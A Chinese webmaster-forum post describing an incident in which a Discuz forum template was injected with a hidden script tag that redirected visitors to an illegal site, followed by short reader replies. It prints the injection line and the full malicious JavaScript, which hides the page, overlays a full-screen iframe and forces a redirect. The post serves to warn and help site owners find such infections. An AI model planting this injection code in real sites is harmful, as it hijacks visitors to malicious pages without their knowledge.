某论坛模板被挂马隐藏跳转到非法网站排查经历-站长窝

某论坛模板被挂马隐藏跳转到非法网站排查经历 discuz 教程

游客1 游客组

今日，一建站学习研究会员报告，自己论坛被百度收录的首页点击进入后会隐藏跳转到一个非法网站页面，经过排查，网站模板漏洞被挂马，
利用语句：

<div style="visibility:hidden;"><script src="//wwww.ccak47.com/fres.js" language="JavaScript"></script>

木马js分析：

if (parent["window"]["opener"]) {
	parent["window"]["opener"]["location"] = 'https://www.3306.cc'; //父窗口弹窗,对部分浏览器有效
}
var num = Math.random();//Math.random()：得到一个0到1之间的随机数
num = Math.ceil(num * 100);
var wz;
if(num<=35){
	wz='https://www.3306.cc/MemberCenter/Member/Register/11048';//这是%35的概率	
}
else if (num<=70){
	wz='https://www.3306.cc/MemberCenter/Member/Register/11048';//这是%35的概率
}
else if (num<=85){
	wz='https://www.3306.cc/MemberCenter/Member/Register/11048';//这是%15的概率
}	
else{
        wz='https://3306.cc/';//这是%15的概率
}





function hide_parent_view()
{
    var i;
    var c=document.body.childNodes;
    for (i=0; i<c.length; i++)
    {
        try{
            if(c[i].id != "__overflow_view")
            {
                if(c[i].style)
                {
                    c[i].style.display = "none";
                }
            }
        }
        catch(e)
        {}
    };
}


var __old_onload = null;
function ___page_onload()
{
    hide_parent_view();
    setInterval(hide_parent_view, 100);
    document.body.style.overflow = "hidden";
    if(__old_onload != null)
    {
        __old_onload();
    }
}
__old_onload = window.onload;
window.onload = ___page_onload;

document.writeln('<iframe id="__overflow_view" width="100%" height="100%" style="position: fixed;background: white;border: none;top: 0;left: 0;z-index: 1999999999; _position: absolute; _top: expression(eval(document.documentElement.scrollTop));  " src="' + wz + '">');
document.writeln('</iframe>');

document.writeln("<style>");
document.writeln("body{overflow:hidden !important}");
document.writeln("body > div{display:none}");
document.writeln("</style>");


window.setTimeout("window.location='"+wz+"'",3000); 
document.write ('<sc'+'ript language="javascript" type="text/javascript" src="http://js.users.51.la/19210815.js"></sc'+'ript>');

请站长们一定要注意自己网站安全，请尽量下载建站学习研究网友发布资源，切勿随意给淘宝或其他非官方人员FTP、后台信息，外面挂马资源横行，骗子维护人员猖狂，很多打着免费的幌子嵌入垃圾代码、挂马代码js等层出不穷，站长窝唯一可以给站长保证的是，站长窝80%资源都是自己应用中心分享的原版插件分享的，其他建站学习研究网友发布的都是建站学习研究自己分享分享给站长窝的。注重自己网站安全，规范自己安全意识十分重要，以上案列清楚显示了病毒挂马行为的运行机制，仅供有相同经历的站长分析查找自己网站漏洞的演示，切勿用于非法用途，否则后果自负。

温馨提示：

首先感谢您莅临站长窝,有任何宝贵意见欢迎反馈！

帖子如有遇到:图片不显示，附件不存在，解压密码不正确，等各种问题！请联系QQ：3535510005

QQ群：960474828

站长窝论坛版权声明 1、本帖标题：某论坛模板被挂马隐藏跳转到非法网站排查经历
2、论坛网址：站长窝论坛
3、站长窝论坛的资源部分来源于网络，如有侵权，请联系站长进行删除处理。
4、会员发帖仅代表会员个人观点，并不代表本站赞同其观点和对其真实性负责。
5、站长窝论坛一律禁止以任何方式发布或转载任何违法的相关信息，访客发现请向站长举报
6、本帖由游客1在站长窝论坛《程序综合区》版块原创发布，转载请注明出处！

上一篇：say手机模板商业版（2017.08.31更新）--------下载地址
下一篇：该版块指定已认证网站用户可以回帖，请点我进行网站认证

最新回复 (11)

最新最早只看楼主

柔雨情四级用户组

引用 2楼

謝謝教學~

2017/09/24 10:42:08 只看Ta 回复
游客游客组

引用 3楼

ssssssss当然发斯蒂芬

2017/09/24 20:31:26 只看Ta 回复
地摊网一级用户组

引用 4楼

看下什么木马

2017/09/26 16:44:58 只看Ta 回复
隔壁老卢一级用户组

引用 5楼

某论坛模板被挂马隐藏跳

2017/10/04 22:14:18 只看Ta 回复
安全电影一级用户组

引用 6楼

RE: 某论坛模板被挂马隐藏跳转到非法网站排查经历 [修改]

2017/10/05 00:03:40 只看Ta 回复
新时代影视三级用户组

引用 7楼

Kankan

2017/10/28 17:31:06 只看Ta 回复
偏南风一级用户组

引用 8楼

感谢提供分享

2017/11/01 20:33:04 只看Ta 回复
无悔这一生一级用户组

引用 9楼

看看~

2018/06/18 23:16:17 只看Ta 回复
guo40299055 一级用户组

引用 10楼

谢谢分享，谢谢

2018/07/11 01:24:50 只看Ta 回复
307932425 一级用户组

引用 11楼

大打算打算倒萨

2018/07/13 14:48:18 只看Ta 回复
sw88 一级用户组

引用 12楼

模板被挂马隐藏跳转到非

2018/08/10 08:57:18 只看Ta 回复

发新帖

游客1

主题数
4876

帖子数
11296

精华数
0

注册排名
88

作者最近主题